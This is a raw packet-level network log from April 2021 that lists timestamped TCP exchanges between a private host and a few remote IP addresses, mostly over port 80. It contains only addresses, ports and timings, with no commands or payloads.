                                                                                                                                          Apr 28, 2021 23:00:13.671768904 CEST4998380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.673242092 CEST4998580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.754534006 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754602909 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754797935 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754837990 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754858017 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754873991 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.754887104 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755072117 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755076885 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.755124092 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755223036 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.755222082 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755242109 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.755260944 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.755345106 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755381107 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.755928993 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.756047964 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.756093979 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.756114006 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.756131887 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.756144047 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.756159067 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758431911 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.758682013 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758768082 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.758882999 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758898973 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758909941 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758920908 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.758950949 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.759016037 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.759255886 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.759337902 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.843504906 CEST4999780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.845061064 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.852615118 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852643967 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852659941 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852857113 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852874994 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852890015 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852910042 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.852952957 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853101969 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853141069 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853163958 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853291035 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853414059 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853431940 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853579044 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853660107 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853677988 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853771925 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853827000 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853872061 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.853916883 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.853992939 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.854130983 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.854151011 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.854207993 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.854235888 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.854322910 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.854420900 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.854441881 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.854460001 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.854507923 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.854541063 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.942756891 CEST8049998176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.943032026 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.944256067 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.945347071 CEST8049997176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.945482969 CEST4999780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.949379921 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.949441910 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.949532032 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.949666023 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.949712038 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.949719906 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.949811935 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.950287104 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950315952 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950342894 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950418949 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:16.950781107 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950809002 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950860023 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.950968981 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951222897 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951262951 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951416016 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951447010 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951594114 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951661110 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951785088 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951817036 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951852083 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.951978922 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952006102 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952327967 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952357054 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952543974 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952581882 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952724934 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:16.952763081 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.040129900 CEST8049998176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.043406963 CEST8049998176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.044884920 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.045219898 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.045353889 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.045372009 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.045790911 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.046159983 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.047816038 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.048135042 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.108561039 CEST49683443192.168.2.440.126.31.4
                                                                                                                                          Apr 28, 2021 23:00:17.108678102 CEST4968780192.168.2.472.21.91.29
                                                                                                                                          Apr 28, 2021 23:00:17.108938932 CEST4968680192.168.2.48.241.82.126
                                                                                                                                          Apr 28, 2021 23:00:17.109112978 CEST4968580192.168.2.48.241.82.126
                                                                                                                                          Apr 28, 2021 23:00:17.144612074 CEST8049996176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.144855022 CEST4999680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.152520895 CEST80496868.241.82.126192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.152657032 CEST4968680192.168.2.48.241.82.126
                                                                                                                                          Apr 28, 2021 23:00:17.153314114 CEST80496858.241.82.126192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.153444052 CEST4968580192.168.2.48.241.82.126
                                                                                                                                          Apr 28, 2021 23:00:17.156069994 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.157120943 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.169131994 CEST4434968340.126.31.4192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.170943975 CEST49683443192.168.2.440.126.31.4
                                                                                                                                          Apr 28, 2021 23:00:17.230691910 CEST804968772.21.91.29192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.230870962 CEST4968780192.168.2.472.21.91.29
                                                                                                                                          Apr 28, 2021 23:00:17.251663923 CEST8049998176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.251811028 CEST4999880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.256597996 CEST8050000176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.256792068 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.258733034 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.342653036 CEST49714443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 23:00:17.342724085 CEST49684443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 23:00:17.359637976 CEST8050000176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.363420963 CEST8050000176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.363615036 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.403245926 CEST4434968440.126.31.6192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.403374910 CEST49684443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 23:00:17.403634071 CEST4434971440.126.31.6192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.403733969 CEST49714443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 23:00:17.476507902 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.479065895 CEST5000180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.576050043 CEST8050001176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.576160908 CEST5000180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.577191114 CEST5000180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.577451944 CEST8050000176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.577543020 CEST5000080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.673105955 CEST8050001176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.677256107 CEST8050001176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:17.677352905 CEST5000180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.780981064 CEST5000180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.782399893 CEST5000280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:17.877005100 CEST8050001176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.118890047 CEST5001180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.119419098 CEST5001180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.121268988 CEST8050010176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.122937918 CEST5001080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.161289930 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.161488056 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.161665916 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.161684990 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.161700010 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.161880016 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.162225008 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.164510965 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.164767981 CEST5000980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.220541954 CEST8050011176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.225033045 CEST8050011176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.225114107 CEST5001180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.262187004 CEST8050009176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.262849092 CEST5000980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.328325033 CEST5001180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.329456091 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.428114891 CEST8050012176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.429697990 CEST8050011176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.429891109 CEST5001180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.429924965 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.430602074 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.527796984 CEST8050012176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.532105923 CEST8050012176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.532187939 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.640471935 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.641557932 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.735416889 CEST8050014176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.735549927 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.736064911 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.737510920 CEST8050012176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.737607956 CEST5001280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.831701994 CEST8050014176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.836692095 CEST8050014176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.836865902 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.957986116 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:20.959274054 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.051979065 CEST8050014176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.052020073 CEST8050015176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.052093983 CEST5001480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.052129030 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.052602053 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.145735979 CEST8050015176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.149344921 CEST8050015176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.149436951 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.266383886 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.268492937 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.359381914 CEST8050015176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.359482050 CEST5001580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.364733934 CEST8050017176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.364871025 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.367979050 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.464859009 CEST8050017176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.468781948 CEST8050017176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.468863964 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.578073978 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.579183102 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.673652887 CEST8050017176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.673758984 CEST8050019176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.673764944 CEST5001780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.673856974 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.674333096 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.769072056 CEST8050019176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.773132086 CEST8050019176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.773247957 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.876632929 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.877722025 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.971618891 CEST8050019176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.971751928 CEST5001980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.972742081 CEST8050020176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:21.972841024 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:21.973414898 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.070316076 CEST8050020176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.074280977 CEST8050020176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.074378014 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.187576056 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.188555002 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.282505989 CEST8050020176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.282607079 CEST5002080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.288211107 CEST8050021176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.288315058 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.288805962 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.390064001 CEST8050021176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.394026995 CEST8050021176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.394118071 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.508847952 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.509936094 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.609702110 CEST8050021176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.609863043 CEST5002180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.610728025 CEST8050022176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.610929012 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.612209082 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.711720943 CEST8050022176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.715763092 CEST8050022176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.718034029 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.828330994 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.829339027 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.922581911 CEST8050023176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.925086021 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.925429106 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:22.927840948 CEST8050022176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:22.931988955 CEST5002280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.018487930 CEST8050023176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.022763968 CEST8050023176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.022828102 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.045479059 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.124996901 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.126133919 CEST5002580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.149766922 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.149909973 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.150165081 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.218305111 CEST8050023176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.218434095 CEST5002380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.219156981 CEST8050025176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.219259024 CEST5002580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.219957113 CEST5002580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.251540899 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.251581907 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.251713991 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.251749992 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.251950979 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.252060890 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.252121925 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.252156019 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.252506971 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.252639055 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.252787113 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.252882957 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.252986908 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.253087997 CEST5002480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:23.253268957 CEST8050024176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:25.130585909 CEST8050034176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:25.130707979 CEST5003480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:25.131279945 CEST5003480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:25.241534948 CEST8050034176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:25.245347023 CEST8050034176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:25.245434999 CEST5003480192.168.2.4176.111.174.114
